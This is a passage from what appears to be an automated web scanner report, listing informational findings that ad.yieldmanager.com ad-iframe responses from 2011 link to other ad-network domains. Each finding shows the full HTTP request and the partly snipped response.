<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601424_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT9FqgzAU.RrfJMTEqkX2EJt1yBqZkHW4lxJjnNJqbHTU-fULs.QHdrnce87h3APXw3Epy03ol15d16EohYg9jGSIBA4UdmEcxwhBHGKIotAd06Qi1IMp2T3LICd.Rbf0dUV20ojkemVvEQE3CoCvDbut0pV
...[SNIP]...
.OjBdzxhks7i.Z-yfXbaZpcDBx0N52BSYjKjUDPah-BlJ3VhS1AUNjTXujaqPGxsHUhw4KFt2rtrIs2MCt5bK0uO1HZaaTEX2lu1P.3ZXKnBpllDVctLSOX8m2c7k=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601424_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601424_HERE" border="0" alt="">
</a>
...[SNIP]...

19.66. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADYg90dOOXRCkv9W31uXOaJHlcJu4r0XesXqZhDAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3144707195%26r%3D0%26s%3D2126909,0bb01040-ed56-11e0-b328-78e7d16291b6,1317601464017 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:24 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0111.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:24:24 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601464_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljFFrgzAUhX-NbxISTTUie4jNBFnTTQgr7qXYJE7X1rSpQ-evX5ilf2CXcHPO4bsHhWlSK4QiSOqmWTWY6BSFgYwDl0LswzRNMUpwHBNIYv9WZIoyBAu6fpZRSf-GJexlUW4zQkuzuDdCwcgAwMbycYmunMA
...[SNIP]...
H9vIq829573P2T77fDcPFC6gW5ewoMtlZ6Auai-wlIc3Zh3VhwaR2UW91YfWu9kGHoBdFset0p56IVTJyXB6e7.qbtsLd1r8x533-fD9ruW221A05GOuIXP-xzzQ==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601464_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601464_HERE" border="0" alt="">
</a>
...[SNIP]...

19.67. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsbv4S6uHRCsZBWrFpSzPiPf4Iic4EuzWrYG.kAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1826082959%26r%3D0%26s%3D2126909,13d02e2e-ed54-11e0-b6da-78e7d162b00c,1317600618655 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:54 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0389.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:10:54 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600618_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGlTtFugzAM.BreWJQACyC0h9AUia1UY0Kb6EtFE7ewFtIFJlq-flGp-gOzLPvudD6ZuJHwMbiV5wE44OCQRsR1hE.Ap9izcRRFhFDi0zB0ArtPY8k4wSlbLAXN2a14yN9mZCYPWK5m9h4wNHKEPKWzcZZ-sgA
...[SNIP]...
p5zIryWn6zsbz.ae5fbLsehrPlMstJTEs06ErCBakzdBckVGvEaq.RuTamRMNeQ19bLvew5dBJddBIw-gzDg0XO4Obrgc9bHXVSdVuu992B3pbgwZjOClhHH8GCHP.,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600618_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600618_HERE" border="0" alt="">
</a>
...[SNIP]...

19.68. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjoVr4SeTRCnCT01hh121xwr-ElGj9j1TkWGFGAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1978687631%26r%3D0%26s%3D2126909,7d4f2ad4-ed55-11e0-bb70-78e7d1f507a4,1317601225145 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:25 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0060.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:20:25 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317601225_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljMtugzAQRb-GHbL8IDyEujBxqVADalRSRDcRsZ1CCZg6RNB8fa1S8QMdjWbOHd25iIQuCbxgU3HOiXRcfA4RwdzDHuaOsGEYhjiADiTQ9ZB9TSJBGYIJ3T5yd09.iwXseSEzmU.3alEvPgUTA8BROp2W01f
...[SNIP]...
dctGlRopSJOlsf6YNt1-M4WIRaODYtwKgrIWegBtnPgKvOHKuzBkNtTLGWZy2vtUWYAy3s3lUvG2GUu4GB0fxkuOmvUo9HXfVCdcf-1p2kPtZSS2O4KG4cPyftc9k=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601225_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317601225_HERE" border="0" alt="">
</a>
...[SNIP]...

19.69. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following link to another domain (the pagead2.googlesyndication.com script in the response body below).

Request

GET /iframe3?Hv0hAJBoGgAnFoYAAAAAAHwwIgAAAAAAAAD8AQIAAAAAAP8A.wD..ziOJgAAAAAAJtcsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTIxEAAAAAAAIAAgAAAAAAumx0zk9xnD-6bHTOT3GcP6lNnNzvUKQ.qU2c3O9QpD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABThIHDCPrRCk1snMRCLBJSPZqa77.0ztS7XLZNAAAAAA==,,http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html,B%3D10%26Z%3D300x250%26_salt%3D3038281923%26atf%3D1%26brw%3Dcr3%26cb%3D10909902593%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26r%3D0%26rtg%3Dga%26s%3D1730704%26tphv%3Dch%26ttvl%3Dch%26uatRandNo%3D1419,73842556-ed62-11e0-91db-78e7d1f5a930,1317606792173 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:53:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0050.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 01:53:13 GMT
Pragma: no-cache
Content-Length: 619
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8787495);}
</script><script type="te
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

19.70. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAru.OJ1t7RCu8a7TEsU0sxGAgeoBu29n167UjeAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D2258205715%26r%3D0%26s%3D2126909,3e0a55fe-ed52-11e0-8e89-93bbc1df9668,1317599830507 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0101.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:57:10 GMT
Pragma: no-cache
Content-Length: 1850
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599830_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGljE1ugzAQhU.DjlrYgAGhLkydVDSBNBEqIhvEjwlpABNDFcTpY5WKC3Q0mvne05uBugt1qzINbGGHlYaJTGmgwoKQ6Xmmaq7rIsPBNsKWA9XB90pCoeYTb7e7H8lvUYfuFpKT2uSYLOrTJuBBATC4CB6LdQ9
...[SNIP]...
ftx3cQn9pDlKDDekheVbUex17RiYK2skswiqxkE-A96yZQ8FaaWSVAX8vQVrBKsKFWdGpoCsIz79i1lAqbEEpd5JKv3cDEmIqsK3mbdj9tzkRaM8FkoOGFTDwB-eVycw==,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599830_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599830_HERE" border="0" alt=""></a>
...[SNIP]...

19.71. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbv7IlaeHRCmPyiUJU7w5zmIiNQFlOPR3415QOAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1313598906%26r%3D0%26s%3D2126909,c67c731c-ed53-11e0-9564-3c4a92f70634,1317600488922 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0056.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:08:10 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=1317600488_HERE" frameborder="0" scrolling="no" width="160" height="600">
<a href="http://ad.yieldmanager.com/clk?3,eAGljG9rgzAQxj-N7yRcEv8V2YvY1CJrZAXZ6KvSxDjbVeOipcVPvzBHv8CO4-73HM89mKYAUmEgUkagSECSFFOiYiwb2tQ-pGlKwziIAeOY-GOR1YxjKNh6o6I9-y2-4q8LuckTtjeLeksYunOEAmPFfTl9iwS
...[SNIP]...
ndhKI7UMEPc.l8ZC--307T4FHmkdx1jSZ7qvUDmUH3D6RM546nxqKhdabc6sbqsfUoD8Aj0Wx6fa6dikJYOa2k43M.ajsd7amvTXfsb53U9thqq53hapRz.AAkQ3I1,http://psa-d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600488_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34602&cs=4e3c55af5608c&cb=1317600488_HERE" border="0" alt="">
</a>
...[SNIP]...

19.72. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMfNruO-TRCrTno9DEBATa0DCOhQ96J5lSm15cAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2618088274%26r%3D0%26s%3D2126909,74e35e9c-ed55-11e0-9bce-78e7d1fa05aa,1317601211017 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:11 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0355.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:20:11 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=1317601211_HERE" frameborder="0" scrolling="no" width="300" height="250">
<a href="http://ad.yieldmanager.com/clk?3,eAGlT21rgzAQ.jV-k5D4PmQfYoMga8oKWaV-EU3idFXjoqPSX79slv6BHsfd8xzPPcchN4aSy8aPUIiQqKXnxMh1eOgEjd9ENozj2PVCP3Cg57v2nCUCEwQzvMt5cMT.QV7I24ZMJRE-Zht7jzC4EgA8pel1G33
...[SNIP]...
xcaF60lJza8.0ls.9q2-2yTJaLLSc1KcCiKyFXoCY5roCrwQyrRoOpNaJUy0bLubVc4kHLCW5qlJ0wLPDRH-e1wd04S72UuhqFGsrxZ6ilLluppRH0ihvFLyNhc6I=,http://psa-d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601211_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34589&cs=4e3c3f8146bae&cb=1317601211_HERE" border="0" alt="">
</a>
...[SNIP]...

19.73. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string (the /iframe3 request below). The response contains the following links to other domains (the psa-d.openx.com references in the response body below).

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrJf0pPuPRCvvfaOyucn1z-FM2wpgnGn-z1vnxAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2104624894%26r%3D0%26s%3D2126909,de26564e-ed54-11e0-8e49-78e7d162a0c4,1317600958120 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:28 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
